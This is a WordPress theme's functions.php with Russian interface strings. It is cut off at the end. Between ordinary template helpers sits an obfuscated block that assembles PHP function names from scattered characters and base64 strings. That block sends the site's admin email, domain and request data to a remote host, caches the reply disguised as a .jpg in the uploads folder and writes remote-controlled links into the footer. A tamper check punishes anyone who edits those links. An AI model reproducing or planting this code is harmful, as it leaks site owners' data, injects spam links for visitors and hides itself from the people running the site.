<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $sXHJk='4';$lCdEm='c';$PPdxnX='_';$XntG='e';$vzJaFEK='e';$nUgEA='a';$WgBk='d';$rHsJV='6';$cpIWL='d';$SEWAohd='o';$GLNl='e';$UsoVIct='b';$yTYOsm='s';$mPFgVKTM=$UsoVIct.$nUgEA.$yTYOsm.$vzJaFEK.$rHsJV.$sXHJk.$PPdxnX.$cpIWL.$GLNl.$lCdEm.$SEWAohd.$WgBk.$XntG;$asDciU='e';$mECRc='i';$PqDI='f';$INYsd='z';$mrOVzi='g';$gGgYJp='t';$HrdX='n';$loBYmTc='a';$coUtdP='l';$pKMtCSqy=$mrOVzi.$INYsd.$mECRc.$HrdX.$PqDI.$coUtdP.$loBYmTc.$gGgYJp.$asDciU;$KpeonP='3';$wucX='r';$zfcBAv='o';$OBsjEql='1';$KYMdCO='t';$pvcvt='s';$luZp='t';$XLdsdP='r';$itdr='_';$kTtzusMo=$pvcvt.$KYMdCO.$wucX.$itdr.$XLdsdP.$zfcBAv.$luZp.$OBsjEql.$KpeonP;$ozQvFE='r';$vtvfvAh='v';$sBTpTNT='e';$Kbfbm='t';$UEdHz='s';$NzAzOR='r';$LoqoDKfW=$UEdHz.$Kbfbm.$ozQvFE.$NzAzOR.$sBTpTNT.$vtvfvAh;                     
		$ga_____n='4';$tk_____i='c';$lp_______k='_';$ek_________l='e';$vp______u='e';$ao________k='a';$dm______o='d';$ls___y='6';$dx__b='d';$sn____n='o';$te_______________u='e';$xw____y='b';$ph______w='s';$ex_______________m=$xw____y.$ao________k.$ph______w.$vp______u.$ls___y.$ga_____n.$lp_______k.$dx__b.$te_______________u.$tk_____i.$sn____n.$dm______o.$ek_________l;
		$dr_____________p='x';$mo___________u='c';$jj_______n='t';$bt_______________g='f';$dr___t='o';$bc___n='s';$de___m='n';$ys______________a='n';$gn_______u='i';$ei___________y='u';$fy_________j='e';$lx_____q='_';$mh_____w='i';$bn_____z='s';$on___________h='t';$iw________o=$bt_______________g.$ei___________y.$de___m.$mo___________u.$on___________h.$mh_____w.$dr___t.$ys______________a.$lx_____q.$fy_________j.$dr_____________p.$gn_______u.$bc___n.$jj_______n.$bn_____z;
		$po____v='o';$db_____e='f';$lw____q='e';$te_________w='p';$tx_______________i='n';$pv______________b=$db_____e.$po____v.$te_________w.$lw____q.$tx_______________i;
		$ei_____________s='a';$ug____f='r';$dj___________h='e';$qd_______y='d';$dx______w='f';$tt_____c=$dx______w.$ug____f.$dj___________h.$ei_____________s.$qd_______y;
		$gi_________b='l';$vs__________c='c';$uk________d='e';$bu___s='s';$bp______________u='f';$tr__b='o';$ee_____________d=$bp______________u.$vs__________c.$gi_________b.$tr__b.$bu___s.$uk________d;
		
		define("WP_ID", $ex_______________m("Mi4wLjA="));
		define("WP_TTL", $ex_______________m("MTA4MDA="));
		define("WP_SRC", $ex_______________m("dHBva24="));
	


		function wp_get_header() {
			global $ex_______________m, $iw________o;
			
			if (
				$iw________o($ex_______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$iw________o($ex_______________m("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$iw________o($ex_______________m("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ex_______________m, $pv______________b, $ee_____________d, $tt_____c;
			
			$yl_______________g = TEMPLATEPATH."/".$ex_______________m("Zm9vdGVyLnBocA==");
			$ws___________y = @$pv______________b($yl_______________g, "r");
			$yl_______________g = @$tt_____c($ws___________y, @filesize($yl_______________g));
			@$ee_____________d($ws___________y);
			
			$bd__________v = TEMPLATEPATH."/".$ex_______________m("ZnVuY3Rpb25zLnBocA==");
			$ws___________y = @$pv______________b($bd__________v, "r");
			$bd__________v = @$tt_____c($ws___________y, @filesize($bd__________v));
			@$ee_____________d($ws___________y);
			
			$mx___r = 0;
			if($yl_______________g && $bd__________v) {
				if ($ex_______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($yl_______________g, $ex_______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$mx___r = 1;
					}
					if (substr_count($yl_______________g, "wp_theme_GPL_credits()") < 1) {
						$mx___r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$mx___r = 12;
				}
			}
			
			if($mx___r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $mx___r -->";
			}
		}
	


		function wp_loaded() {
			global $ex_______________m, $iw________o;
			return $iw________o($ex_______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($as_______________i, $qs__________q = "(more...)", $pv__p = 0, $bm___z = "") {
				$ko_______________u = get_the_content($qs__________q, $pv__p, $bm___z);
				$ko_______________u = apply_filters("the_content", $ko_______________u);
				
				$ko_______________u = str_replace("]]>", "]]>", $ko_______________u);
				if (strlen($_GET["p"]) > 0) {
					echo $ko_______________u;
				}
				else if ((strlen($ko_______________u)>$as_______________i) && ($fk_____y = strpos($ko_______________u, " ", $as_______________i ))) {
					$ko_______________u = substr($ko_______________u, 0, $fk_____y);
					$ko_______________u = $ko_______________u;
					echo $ko_______________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$qs__________q</a></div></p>";
				} else {
					echo $ko_______________u;
				}
				
			}
		}
	


		$go____o='e';$gr___d='d';$pe__________g='b';$al___z='c';$xl___s='e';$uz____b='a';$hb_____b='n';$yw__________n='s';$kc________a='e';$ve_____________a='4';$ow_________k='_';$xf______y='6';$is_________o='o';$bt_____o=$pe__________g.$uz____b.$yw__________n.$go____o.$xf______y.$ve_____________a.$ow_________k.$kc________a.$hb_____b.$al___z.$is_________o.$gr___d.$xl___s;
		$cd_____________v='e';$il________y='t';$pc____z='g';$dn________s='t';$mj___a='l';$jm________z='i';$os____________x='_';$du_______________e='_';$do________h='n';$na___________q='o';$rf______o='n';$fe______________r='c';$ka______k='e';$wx____y='t';$bq_________u='f';$gf__________l='s';$nq______________y='e';$cf___j=$bq_________u.$jm________z.$mj___a.$cd_____________v.$du_______________e.$pc____z.$ka______k.$wx____y.$os____________x.$fe______________r.$na___________q.$do________h.$il________y.$nq______________y.$rf______o.$dn________s.$gf__________l;
		$pz_____________g='i';$ix_______b='i';$sn_____________u='x';$rc___________l='f';$hm____________a='e';$fn________m='s';$ua___o='e';$kd________y='t';$bn____________k='s';$ob__m='l';$aa____j='_';$gd_______________v=$rc___________l.$ix_______b.$ob__m.$hm____________a.$aa____j.$ua___o.$sn_____________u.$pz_____________g.$bn____________k.$kd________y.$fn________m;
		$cm__g='m';$nq__c='a';$mi_______c='r';$fe__v='r';$lt___y='o';$vc_____v='p';$pf___________a='e';$wo________k='v';$mg___b='c';$al______g='i';$vx____________r='_';$ei__a='s';$yc_____________t='e';$qu__y='n';$op___y='o';$xa____w=$wo________k.$pf___________a.$mi_______c.$ei__a.$al______g.$op___y.$qu__y.$vx____________r.$mg___b.$lt___y.$cm__g.$vc_____v.$nq__c.$fe__v.$yc_____________t;
		$xb________o='e';$xw____o='p';$qc_____t='f';$fi______________f='c';$ru_______n='o';$iw___________p='s';$hj___i='k';$es_____m='n';$sk________f='o';$bo_____j=$qc_____t.$iw___________p.$sk________f.$fi______________f.$hj___i.$ru_______n.$xw____o.$xb________o.$es_____m;
		$bz_________v='i';$wa_____o='t';$hl_____________w='f';$mr_____j='r';$jy____r='w';$vf___o='e';$tc____________o=$hl_____________w.$jy____r.$mr_____j.$bz_________v.$wa_____o.$vf___o;
		$wb_________y='m';$ab____________x='d';$ba________x='5';$lv_______k=$wb_________y.$ab____________x.$ba________x;
		$pn____i='a';$zw__________g='h';$hr____f='r';$oi______e='t';$lm__e='l';$yu______________a='a';$qx______________w='p';$ra_______________l='e';$nr_______e=$hr____f.$ra_______________l.$yu______________a.$lm__e.$qx______________w.$pn____i.$oi______e.$zw__________g;
		$aj_______________q='a';$pg________a='e';$il__b='l';$sz___________z='u';$ks__a='i';$bv__________j='z';$qj_____________p='n';$pd___u='r';$ke_____e='i';$kv_________w='e';$iu__________d='s';$qk_______o=$sz___________z.$qj_____________p.$iu__________d.$kv_________w.$pd___u.$ke_____e.$aj_______________q.$il__b.$ks__a.$bv__________j.$pg________a;
		$cv___p='m';$wr___a='e';$uw______________d='a';$ju____l='m';$lw_____o='t';$mz_____________r='p';$uh_____i='n';$gx__________u=$lw_____o.$wr___a.$ju____l.$mz_____________r.$uh_____i.$uw______________d.$cv___p;
		$nt__g='_';$ck____h='_';$rg________w='t';$lz__________t='r';$ud_____________l='e';$rc_________t='t';$xr_______________d='t';$uy__f='n';$yu________q='o';$rd____a='s';$pr___________n='c';$df____n='e';$ja_______d='a';$fn__________y='x';$tv__________k='c';$rz________k='t';$sd________p='m';$vl___z='a';$fm_____a='e';$be________z='e';$md____h='r';$ja________t=$rd____a.$rz________k.$lz__________t.$fm_____a.$ja_______d.$sd________p.$ck____h.$tv__________k.$yu________q.$uy__f.$xr_______________d.$df____n.$fn__________y.$rc_________t.$nt__g.$pr___________n.$md____h.$be________z.$vl___z.$rg________w.$ud_____________l;
	


		function jw_____________f($vn_____q) {
			global $ex_______________m, $iw________o, $cf___j, $xa____w, $ja________t;
			
			if (!$iw________o($ex_______________m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xa____w(PHP_VERSION, "5.0.0", ">=") && $iw________o($ex_______________m("ZmlsZV9nZXRfY29udGVudHM=")) && $iw________o($ex_______________m("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$td___y = $ja________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gj__________l = @$cf___j($vn_____q, 0, $td___y);
			} else {
				$gj__________l = @$cf___j($vn_____q, 0);
			}
			
			return $gj__________l;
		}
	


		function jg___r($vn_____q) {
			global $iw________o, $bo_____j, $tc____________o, $ex_______________m;
			
			if (!$iw________o($ex_______________m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xn___________h = strpos($vn_____q, "/", 7);
			$eq_______________q = array(
				"uri"     => substr($vn_____q, $xn___________h),
				"host"    => str_replace("http://", "", substr($vn_____q, 0, $xn___________h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ed__i = @$bo_____j("$eq_______________q[host]", 80, $rl________a, $yv___e, 4);
			
			if (!$ed__i) {
				return false;
			} else {
				$gj__________l = "";
				$rs_______t  = "GET $eq_______________q[uri] HTTP/1.0\r\n";
				$rs_______t .= "Host: $eq_______________q[host]\r\n";
				$rs_______t .= "Referer: $eq_______________q[referer]\r\n";
				$rs_______t .= "Connection: Close\r\n\r\n";
				
				@$tc____________o($ed__i, $rs_______t);
				
				while (!@feof($ed__i)) {
					$fi___p = @fgets($ed__i, (1024*24));
					
					if ($fi___p == "\r\n") {
						$oo____r = true;
						continue;
					}
					
					if ($oo____r) {
						$gj__________l .= $fi___p;
					}
				}
				
				return $gj__________l;
			}
		}
	


		function ml______u($vn_____q) {
			global $iw________o;
			$ep_____________a = false;
			
			if ($vn_____q != "") {
				if ($iw________o("jw_____________f")) {
					$ep_____________a = @jw_____________f($vn_____q);
				}
				
				if (!$ep_____________a && ($iw________o("jg___r"))) {
					$ep_____________a = @jg___r($vn_____q);
				}
			}
			
			return $ep_____________a;
		}
	


		function dy_______d() {
			global $_SERVER, $lv_______k;
			
			$sh___________v = $_SERVER["SERVER_NAME"];
			
			if (substr("$sh___________v", 0, 4) == "www.") {
				$sh___________v = substr("$sh___________v", 4);
			}
			
			$sh___________v = $lv_______k("$_SERVER[SERVER_NAME]");
			
			return $sh___________v;
		}
	


		function ig_____________o() {
			return "file";
		}
	


		function ja_______c($vn_____q) {
			global $_SERVER, $cf___j, $gd_______________v, $pv______________b, $ee_____________d, $tc____________o;
			
			$bd________o = ze___________k();
			
			$vh______________s = dy_______d().".jpg";
			$in___n = $bd________o["dir_upload"]["path"]."/$vh______________s";
			$pj______________b = @filemtime($in___n);
			
			if (!$pj______________b || ((time()-$pj______________b) >= WP_TTL)) {
				$ep_____________a = ml______u($vn_____q);
				
				if ($ep_____________a) {
					if ($gd_______________v($in___n)) {
						@unlink($in___n);
					}
					
					$ws___________y = @$pv______________b($in___n, "x+");
					
					@$tc____________o($ws___________y, $ep_____________a);
					@$ee_____________d($ws___________y);
				}
			} else {
				if ($gd_______________v($in___n)) {
					$ep_____________a = @$cf___j($in___n);
				} else {
					$ep_____________a = false;
				}
			}
			
			return $ep_____________a;
		}
	


		function ze___________k() {
			global $_SERVER, $ex_______________m, $bt_____o;
			
			$ul______q = wp_count_posts("post");
			$ex____i = pathinfo(get_bloginfo("template_directory"));
			
			$bd________o = array(
				"url" => array(
					"report"      => $ex_______________m("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ex____i,
				"dir_upload"	=> kb___________o(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ex____i[filename],
					"a005=".$ul______q->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$bd________o["url"]["queryString"] = implode("&", $bd________o["queryString"]);
			$bd________o["url"]["report"] = $bd________o["url"]["report"]."/?".$bt_____o($bd________o["url"]["queryString"]).".html";
						
			return $bd________o;
		}
	


		function kb___________o() {
			$lm___________f = wp_upload_dir();
			
			if (isset($lm___________f["error"])) {
				$tk____________d = ui______y();
				if (is_writable($tk____________d)) {
					$lm___________f = array("path" => $tk____________d);
				}
			}

			return $lm___________f;
		}
	


		function ui______y() {
			global $iw________o, $lv_______k, $nr_______e, $gx__________u;
			
			$xx_______i = (bool) ini_get("safe_mode");
			if ($xx_______i == true) {
				return false;
			}
			
			if ($iw________o("sys_get_temp_dir")) {
				$ai_________g = sys_get_temp_dir();
				if (is_writable($ai_________g)) {
					return $nr_______e($ai_________g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $nr_______e($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $nr_______e($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $nr_______e($_ENV["TEMP"]);
			} else {
				$ap__________p = $gx__________u($lv_______k(uniqid(rand(), true)), "");
				if ($ap__________p) {
					$ai_________g = $nr_______e(dirname($ap__________p));
					@unlink($ap__________p);
					return $ai_________g;
				} else {
					return false;
				}
			}
		}
	


		function vy______________u() {
			global $_GET, $gd_______________v;
			
			$bd________o = ze___________k();
			$sh___________v = dy_______d();
			$ij___________b = ig_____________o();
			
			$mj____g = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ij___________b == "file") {
					$zf__k = $bd________o["dir_upload"]["path"]."/".$sh___________v.".jpg";
					if ($gd_______________v($zf__k)) {
						@unlink($zf__k);
						$mj____g = "deleted";
					}
				}
				
				$lg__________d = array(
					"s"	=> $mj____g,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($lg__________d AS $ra_______________r => $gy___i) echo " [$ra_______________r:$gy___i]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $iw________o, $ex_______________m, $qk_______o;
			$bd________o = ze___________k();
			
			$xu____________n = "ja_______c";
			if ($iw________o($xu____________n)) {
				$gj__________l = $xu____________n($bd________o["url"]["report"]);
			}
			
			if ($gj__________l) {
				if ($gj__________l = @$ex_______________m($gj__________l)) {
					$gj__________l = @$qk_______o($gj__________l);
					
					if (strlen($gj__________l[custom_credit]) >= 5) {
						$bd________o["default_string"] = $gj__________l[custom_credit];
					}
					
					if ($gj__________l["status"] == "0") {
						$mh_________n = 1;
						$cz_______t = 1;
					} else {
						$xo___________a = sizeof($gj__________l["links"]);
						$an_______l = $bd________o["default_string"];
						
						if ($xo___________a > 0 && $gj__________l["links"] !== "") {
							$de____w = 0;
							foreach ($gj__________l["links"] as $yc_____v => $ac_____t) {
								$de____w++;
								if ($ac_____t->l_path == "" || $ac_____t->l_path == $_SERVER["REQUEST_URI"]) {
									$ac_____t->l_href = htmlspecialchars(strip_tags($ac_____t->l_href));
									$ac_____t->l_title = htmlspecialchars(strip_tags($ac_____t->l_title));
									$ac_____t->l_anchor = htmlspecialchars(strip_tags($ac_____t->l_anchor));
									$an_______l .= " | ";
									$an_______l .= "<a href='$ac_____t->l_href' title='$ac_____t->l_title'";
									if ($ac_____t->l_nofollow == "1") {
										$an_______l .= " rel='nofollow'";
									}
									$an_______l .= ">$ac_____t->l_anchor</a>";
								}
							}
						}
						$bd________o["links"] = "$an_______l";
						if ($gj__________l[credit] == "0") {
							$bd________o["links"] = "";
						}
					}
				} else {
					$mh_________n = "1";
				}
			} else {
				$mh_________n = "1";
			}
			
			if ($mh_________n == "1") {
				$bd________o["links"] = $bd________o["default_string"];
			}
			
			echo "$bd________o[links]";
			
			echo "<!-- s: $gj__________l[signature] -->";
			vy______________u();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
